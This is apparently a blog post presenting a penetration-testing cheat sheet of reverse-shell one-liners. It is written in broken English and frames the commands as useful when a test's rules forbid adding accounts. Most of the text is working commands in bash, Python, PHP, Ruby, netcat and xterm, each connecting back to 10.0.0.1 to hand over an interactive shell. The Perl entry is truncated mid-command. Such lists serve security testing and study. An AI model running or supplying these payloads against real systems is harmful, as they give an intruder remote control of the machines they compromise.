Level: This article is aimed to people whith an high technnical skill.
Sometimes, when you are in a penetration test forget an useful commands what allow you take over control of equipment without have to add new user to the system. This means you can entry to the system, starting the connection from inside equipment to outside, this is called "reverse connection". Now, if you attach a bin shell to this reverse connection, then you obtain a "reverse shell".
The rules established before starts the penetration test, said: you can't add a new account / SSH key / .rhosts file.Now, only left yourself a "reverse shell". Well, in this point, the following Cheat Sheet going to be very useful in your future penetration test.
BashSome versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
PERLHere’s a shorter, feature-free version of the perl-reverse-shell:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;
There’s also an alternative PERL revere shell here.
PythonThis was tested under Linux / Python 2.7:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHPThis code assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn’t work, try 4, 5, 6…
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'If you want a .php file to upload, see the more featureful and robust php-reverse-shell.
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
NetcatNetcat is rarely present on production systems and even if it is there are several version of netcat, some of which don’t support the -e option.
nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
xtermOne of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.
xterm -display 10.0.0.1:1